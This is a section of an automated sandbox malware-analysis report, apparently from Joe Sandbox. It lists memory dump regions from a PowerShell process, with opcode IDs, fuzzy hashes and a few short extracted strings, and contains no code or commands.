                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb156f55186fd33629e902a8f0cab471004202d835f1dc52d9c970cf3f873232
                                                            • Instruction ID: c4e25f66e3c9fd5e6a998251ca86b23d65f9da5c5015243e718f697832cf2e8c
                                                            • Opcode Fuzzy Hash: cb156f55186fd33629e902a8f0cab471004202d835f1dc52d9c970cf3f873232
                                                            • Instruction Fuzzy Hash: AD019DB0D15209DECB94EFA8D6846EEBBB4EF08204F2095A9D419A3251D7744B45CB62
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afa14d9981e42c359a29191966f56cae91c9a663e4528c521ac772bee55934a8
                                                            • Instruction ID: 9352ae4f077dd866a775b796adba9826b055c6c4c18acefc137e9777f3d8b9ba
                                                            • Opcode Fuzzy Hash: afa14d9981e42c359a29191966f56cae91c9a663e4528c521ac772bee55934a8
                                                            • Instruction Fuzzy Hash: A2E0923490A208EFCB40DFB8DD409A9BF74EB56300F1491EEE848A7352CA359E49CB95
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c255929013e9008da46ac5a7d8a90461d88c7675e043baccd17dedf774707a80
                                                            • Instruction ID: 9c668e9224a498c72e625e76086b1e3216c679e8781097cd36bdfda34122cb66
                                                            • Opcode Fuzzy Hash: c255929013e9008da46ac5a7d8a90461d88c7675e043baccd17dedf774707a80
                                                            • Instruction Fuzzy Hash: B3F0ED3090F258DFC702DFA4D9904ACBF74AB46300F2081DEE884AB252CA319E46CB95
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 362910d71c5999b41fe150d9c1a8a52733729050fe01864dad23d599e8b695f4
                                                            • Instruction ID: cd2ab50a0176acadaaced99c5bd23bdf78ca842b57dcba8ba633ca74ed08d872
                                                            • Opcode Fuzzy Hash: 362910d71c5999b41fe150d9c1a8a52733729050fe01864dad23d599e8b695f4
                                                            • Instruction Fuzzy Hash: C2F03071E04619ABDB09DBA4D848BDDBFF6EB84215F048099D10696251DB741A81CBC5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86b57bd8c70dc56801b551159afab156944286d37d16f6678720e6b1f3c35e3a
                                                            • Instruction ID: f2b6dc316f2a1730b22a83cee4e63e69f2c0e784b6d6fb4dcc9e6ef9dfeeae4b
                                                            • Opcode Fuzzy Hash: 86b57bd8c70dc56801b551159afab156944286d37d16f6678720e6b1f3c35e3a
                                                            • Instruction Fuzzy Hash: 14F0A03490D2448FC701CBB4D441899BFB0EB46300F1481DEC44497392C6324E06EB40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 104c750f12e6385df4fa99977d4b6bc603f351710566447049fb12b1af58c1ef
                                                            • Instruction ID: 535205f1b8325f49a9b8a68ee9271a3045142b55c3a3ab2d37a681729df07258
                                                            • Opcode Fuzzy Hash: 104c750f12e6385df4fa99977d4b6bc603f351710566447049fb12b1af58c1ef
                                                            • Instruction Fuzzy Hash: B3E0DFB2A882649FEBB05A745C41BA533A09B05311F2000F9EE059F2C0F9B19806C642
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 917d6c1314ee1f5ab6d337c71c0f5b133bf30fb8b0d317d8a88570c103790396
                                                            • Instruction ID: e93301637446fa98963398732a4f0fc4c7aec5173fd2da06808fbc38f1b6c3eb
                                                            • Opcode Fuzzy Hash: 917d6c1314ee1f5ab6d337c71c0f5b133bf30fb8b0d317d8a88570c103790396
                                                            • Instruction Fuzzy Hash: C5E06D3090E248DFC705DFA4D9115A8BFB4AB46310F1491EED8449B293CB395986CB81
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 353aefa3f602e3745388e6cb7f7ab55f221063df42ead9b67d1afe61b9a210fc
                                                            • Instruction ID: 84041deb56c2f960af109d33d6a91259d196cded94272a5d9557f2e657265ce3
                                                            • Opcode Fuzzy Hash: 353aefa3f602e3745388e6cb7f7ab55f221063df42ead9b67d1afe61b9a210fc
                                                            • Instruction Fuzzy Hash: 2AF01578E04208EFCB84DFA8D540AADBBF5EB88300F10C0AAA80897340D6359A51EF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f85a8aab7f24e1c27dc307a1c76d930c2454a3b4cfd251f0d8fd0f012753c2dc
                                                            • Instruction ID: 67adc185cf651f40d25de13c132a937adbb699b72bfd4e5e9505dd625ae2fb98
                                                            • Opcode Fuzzy Hash: f85a8aab7f24e1c27dc307a1c76d930c2454a3b4cfd251f0d8fd0f012753c2dc
                                                            • Instruction Fuzzy Hash: 1CF015B5C0434E8FCB04DFBA85451AEFFF5EA49200B1881AFD859E3202E23442068F90
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dee901df8eb82e8df1d69124e57db4412e27c3c0939811a44a2d94a12ce1756c
                                                            • Instruction ID: 58f9397c3b61ca50cb7a8d7b3b45cf65b1b7e87a37f657cfec190c2f46f7761d
                                                            • Opcode Fuzzy Hash: dee901df8eb82e8df1d69124e57db4412e27c3c0939811a44a2d94a12ce1756c
                                                            • Instruction Fuzzy Hash: 5BE0E5B4E05218EFCB84DFA8D5456ADBBF4EB48300F10C4E9D81893341DA359A41CF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0416136ab26ae8f15ed45149b0abc950f0ab1dd62dc310562da044cf1289f7e1
                                                            • Instruction ID: 3c05d9116b565e45c59d8003464138a078b248d12616608b354adebfef1ea7c1
                                                            • Opcode Fuzzy Hash: 0416136ab26ae8f15ed45149b0abc950f0ab1dd62dc310562da044cf1289f7e1
                                                            • Instruction Fuzzy Hash: CEE0E53010C3C48FC3028764D4184687FB0AF5A33030547D7E8968B5E2C6341C00CB95
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c355e50184e0f804d5d244dd3d090295f0db66c1396c925241faf19a9d2c5f4
                                                            • Instruction ID: adc5ee58be8d3d27f719d39ed7603abf24b0b102494cf92eda677a7adc635b6b
                                                            • Opcode Fuzzy Hash: 6c355e50184e0f804d5d244dd3d090295f0db66c1396c925241faf19a9d2c5f4
                                                            • Instruction Fuzzy Hash: 81F09D749112A88FEBA0DF24DA847DDB7B1FB49300F0045EAD41AA2241CB709AC8CF01
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f373d8bbc644435675a13146d889e644802136b1d0afb164f1e382cd219612a
                                                            • Instruction ID: b933e93c0e064556f6f4182f7097fa32590fd8e98873c2a9d0de88de3da5cd89
                                                            • Opcode Fuzzy Hash: 7f373d8bbc644435675a13146d889e644802136b1d0afb164f1e382cd219612a
                                                            • Instruction Fuzzy Hash: 63E0B674E05248EFC784EFA8D5556ADBBF4EB49214F2084EE980893341EA719B45CB81
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81cc4e81fc1fb99ec07d757e63f58932cb1ddd5a60d61d196d5e355b208530e9
                                                            • Instruction ID: d3d05a156def982d5b0b8653cb765b6c285c8d58511ee13343d17f6b0b7d6683
                                                            • Opcode Fuzzy Hash: 81cc4e81fc1fb99ec07d757e63f58932cb1ddd5a60d61d196d5e355b208530e9
                                                            • Instruction Fuzzy Hash: 8CD05B72644328ABEBF06A749C01B6533E8DB05755F6014E5DB155F2C0F9B1E845C751
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d71728d18f670a3146d3653a8075038abed9294272c224d0e7bd633c1ecae62d
                                                            • Instruction ID: 1149819b2ee9989c58d4509cd323e4e430cd4cbb299f073f8f67aa3a6597ee59
                                                            • Opcode Fuzzy Hash: d71728d18f670a3146d3653a8075038abed9294272c224d0e7bd633c1ecae62d
                                                            • Instruction Fuzzy Hash: 8BE0EC74909208DBC744DFA4E5455ADBBB9EB45314F1091DE980817341CB355E46DB81
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 454f0def420a2845aaae6ea317600cfbe2a7e8b0faec44a2af13c9eb6d62a0b2
                                                            • Instruction ID: a82a7f9365c154ef69c7f0ffd6a663434f07899fbe65b649492e4be4b7893ade
                                                            • Opcode Fuzzy Hash: 454f0def420a2845aaae6ea317600cfbe2a7e8b0faec44a2af13c9eb6d62a0b2
                                                            • Instruction Fuzzy Hash: 45E0EC70D4520CDFCB80EFBCD5496ADBBF4BB18201F1050E9A90993290EB755A44CB51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23be5e5f934979ca95f333705ccb6d3ff588f30704f18ba88229f6ad53fb1a72
                                                            • Instruction ID: dcbe1d491d6bf2e4515afc4502687762ec2da2864f16a1ec1b10464bb4855123
                                                            • Opcode Fuzzy Hash: 23be5e5f934979ca95f333705ccb6d3ff588f30704f18ba88229f6ad53fb1a72
                                                            • Instruction Fuzzy Hash: 92E0C238D09208DBC744DFA4E5409ACBBB8EB45300F1080DCD80813381CA329E42CF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b2181f90d30f7db1b17ad99623a7ada09c98e0fe22877862966c6f428092dfa
                                                            • Instruction ID: e6f02a99beb4a9d89fbd31af236a11caac3aa92111b33f5c975062538c556deb
                                                            • Opcode Fuzzy Hash: 3b2181f90d30f7db1b17ad99623a7ada09c98e0fe22877862966c6f428092dfa
                                                            • Instruction Fuzzy Hash: AAD0176188E3C45FC79367F858292D93F20CF17214F0A0ADAE4898A4A3C968154ACB33
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
                                                            • Instruction ID: dcbe43984426c24de39e1115dcbc99b9a35c1166bd6560e3f66e2737e86c9ad2
                                                            • Opcode Fuzzy Hash: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
                                                            • Instruction Fuzzy Hash: 8FE0C234E09208DBC744DFA5E6805ACBBB8EB45300F2080DCE84823341CA319E42CB88
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
                                                            • Instruction ID: 3e0a4140d4ff726c51683ba632fd12729e79ece355cc1af9db589e4068da7f06
                                                            • Opcode Fuzzy Hash: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
                                                            • Instruction Fuzzy Hash: 10E0C274E09208DBCB44DFA8E9805ACBBB9EB55301F1490ECE80813341CA319E42DB84
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16ee0cd62bae3cbface4ec738cad04804a3daedb5ba942c3c75afd5780a7ed40
                                                            • Instruction ID: 63d1a34f76c31f837e634627affe95bce000e0ef08f92959c5f69a20e1e75b6b
                                                            • Opcode Fuzzy Hash: 16ee0cd62bae3cbface4ec738cad04804a3daedb5ba942c3c75afd5780a7ed40
                                                            • Instruction Fuzzy Hash: 8CE02DB4D0531E9F8B44EFBA95451AEFBF5FB49200F14C5AAD829E3301E63456128F91
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6350bf6d6a11dbf6ca77aa6b9869a9b1d6d1a54e6d17d547e1eda275f2aabd90
                                                            • Instruction ID: 0017ca7b77c891658bce58accd32a4d83e9f800cda8039b2e6b5b2f845624ee6
                                                            • Opcode Fuzzy Hash: 6350bf6d6a11dbf6ca77aa6b9869a9b1d6d1a54e6d17d547e1eda275f2aabd90
                                                            • Instruction Fuzzy Hash: 81D067D7C9E7D11FE31296705C752657F61AB37601F4A05DB8E908B1D3A1191438C397
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 314e9dc2e020780117cefb4c705000a6fd918cca8d464b8ec3fa8a60db5b516f
                                                            • Instruction ID: 126a964accaee45f1943ce1dab317391d2a66085183efa50d808fcfbba04e284
                                                            • Opcode Fuzzy Hash: 314e9dc2e020780117cefb4c705000a6fd918cca8d464b8ec3fa8a60db5b516f
                                                            • Instruction Fuzzy Hash: 76E0E270D11358EFCB44EFB8954469DBBB5EB05201F2044E9D80892340EA359A84CB81
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42467780a75fe8251c63d41312f2688649b356adc2bebfa86b9facfafc865a1a
                                                            • Instruction ID: 3e0557279c96ce919b8a5d6b9ecd1944abd086ea099b1b4f450380c4ca924632
                                                            • Opcode Fuzzy Hash: 42467780a75fe8251c63d41312f2688649b356adc2bebfa86b9facfafc865a1a
                                                            • Instruction Fuzzy Hash: D3D017392103588F83049B68E4484A9BBE9FB89330310879AF8AB476A0CA346C01CBC8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eaa46059a4e9dce6614a4658508f231248767710ab7f88e666d5b91e85c4aec3
                                                            • Instruction ID: be39b643f26c7bfd639e50de1d4a44391efa4c9445d0c2f96e7535b59b5db540
                                                            • Opcode Fuzzy Hash: eaa46059a4e9dce6614a4658508f231248767710ab7f88e666d5b91e85c4aec3
                                                            • Instruction Fuzzy Hash: C1D092392103688B86149A59E449856BBE9FB8D31171086AAE84B83720DA71BC01CBC8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0af53281e6a841602f0261826a06b9c6f27b3c074ae96c10bc9f7591957b71d8
                                                            • Instruction ID: b645402aa62683afbe7e48a7f51f4245e4159d409e87166282728ec2d4eacc36
                                                            • Opcode Fuzzy Hash: 0af53281e6a841602f0261826a06b9c6f27b3c074ae96c10bc9f7591957b71d8
                                                            • Instruction Fuzzy Hash: DFD0A730C0021ECBCF00CFD4D04D4BDB774FB41305F104069E90A91641CB380552CF92
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4d6aeb8cfe96668b2d23f1dacd1fd312bf2add555f7f76daa1124e25b2a75260
                                                            • Instruction ID: aa4354f3ce659877f2d6c0594c5f4d7e871708e4b4bdf6cd4a794f1b3ff24afd
                                                            • Opcode Fuzzy Hash: 4d6aeb8cfe96668b2d23f1dacd1fd312bf2add555f7f76daa1124e25b2a75260
                                                            • Instruction Fuzzy Hash: D0C08C7090228C42D1C477E866093293B68DB41215F040498B50C024928E784084C97B
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 720ac5b8597862b4576a0e1ff63d4c510fc06e3f8ba9ea741ee683650a347da6
                                                            • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                                            • Opcode Fuzzy Hash: 720ac5b8597862b4576a0e1ff63d4c510fc06e3f8ba9ea741ee683650a347da6
                                                            • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ednc$TJcq$Te^q$pbq$xbaq
                                                            • API String ID: 0-2085530446
                                                            • Opcode ID: 7c3a3d3ca88e26e398a08f47004268d3e2f4c33bebd2912cf7e3ed448107d986
                                                            • Instruction ID: f59f8f17ab3d5b029b73c384c3f9406bfb5ab9de69064ae8690ebca07be5bc23
                                                            • Opcode Fuzzy Hash: 7c3a3d3ca88e26e398a08f47004268d3e2f4c33bebd2912cf7e3ed448107d986
                                                            • Instruction Fuzzy Hash: 79A2A575A00228DFDB64CF69C984A99BBB2FF89304F1581D9E50DAB365DB319E81CF40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJcq$Te^q$xbaq
                                                            • API String ID: 0-3225726259
                                                            • Opcode ID: e356627992c39d3ade45a9a9dfeae5842ce9d2d228f0b1f970da59ebc0d1cdcf
                                                            • Instruction ID: eefa4dbe75c257cf4946f9c17533dbacfee8371654c22b1411bfd49388c499a0
                                                            • Opcode Fuzzy Hash: e356627992c39d3ade45a9a9dfeae5842ce9d2d228f0b1f970da59ebc0d1cdcf
                                                            • Instruction Fuzzy Hash: DFC14675E016588FDB58DF6AC944ADDBBF2BF89300F14C1AAD809AB365DB305A81CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2$$^q
                                                            • API String ID: 0-1071376767
                                                            • Opcode ID: b38c50261d06de068930ef1e10d98999d59ebab6c5af7a751eb083e78505fc89
                                                            • Instruction ID: cd7127063ccb7c893c555d60d674de11250615f76668f82469f83ffe18c9b043
                                                            • Opcode Fuzzy Hash: b38c50261d06de068930ef1e10d98999d59ebab6c5af7a751eb083e78505fc89
                                                            • Instruction Fuzzy Hash: D8E2F574E042288FEB64DF69D984B9ABBF1FB89301F1081E9E509A7395DB345E81CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fcq$8
                                                            • API String ID: 0-89531850
                                                            • Opcode ID: 1a26d0d3c44d33990626afac3a8d5a0bc0d283aec3185ac14be56b5d6242d712
                                                            • Instruction ID: 46f14f539980cdb158f0d23aa55363b8b08c17cc89573867d99c43ddfdcd6394
                                                            • Opcode Fuzzy Hash: 1a26d0d3c44d33990626afac3a8d5a0bc0d283aec3185ac14be56b5d6242d712
                                                            • Instruction Fuzzy Hash: B352D775D05229CFDBA4DF69C950AD9B7B2FB89310F1082EAD509A7354DB30AE81CF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (bq$,bq
                                                            • API String ID: 0-1616511919
                                                            • Opcode ID: 3c840572385a90e017317aaa1a505b16d46e0e53b8d75290daeda1900381b09a
                                                            • Instruction ID: ff7a8ecb7093c33be0d36fb089ead8e79a29b4258f494149354442fed7cb36da
                                                            • Opcode Fuzzy Hash: 3c840572385a90e017317aaa1a505b16d46e0e53b8d75290daeda1900381b09a
                                                            • Instruction Fuzzy Hash: E9D11B74A005088FDB54DF69C584A6EBBF2FF88711F6585A9E805AF365EB30EC81CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q
                                                            • API String ID: 0-2697143702
                                                            • Opcode ID: 7ad3f254a31f10b0fdad6c8a4cc296804ea25e9d16005dd10e0be44f62af467b
                                                            • Instruction ID: 2c6267ca763acb9eb3fe0d911c1171a94880779b71f58b389e3c638a463e7c79
                                                            • Opcode Fuzzy Hash: 7ad3f254a31f10b0fdad6c8a4cc296804ea25e9d16005dd10e0be44f62af467b
                                                            • Instruction Fuzzy Hash: 3571EA71E042089FEB08DFBAE69169ABFF2EBC9300F14C669D0459B365EF7459068F50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q
                                                            • API String ID: 0-2697143702
                                                            • Opcode ID: 1696263b4a738e08d1525cf6fad87bd39d9693785d254c4344acbe13f8e40a67
                                                            • Instruction ID: 052060a846b0a02017acb96c3528bb995494cf279bf8fe4066bfac11f8412adc
                                                            • Opcode Fuzzy Hash: 1696263b4a738e08d1525cf6fad87bd39d9693785d254c4344acbe13f8e40a67
                                                            • Instruction Fuzzy Hash: E771FB70E042088FEB08DFAAEB9169ABBF2FBC8300F14C269D0059B365EF3459058F50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fcq$h
                                                            • API String ID: 0-1849521214
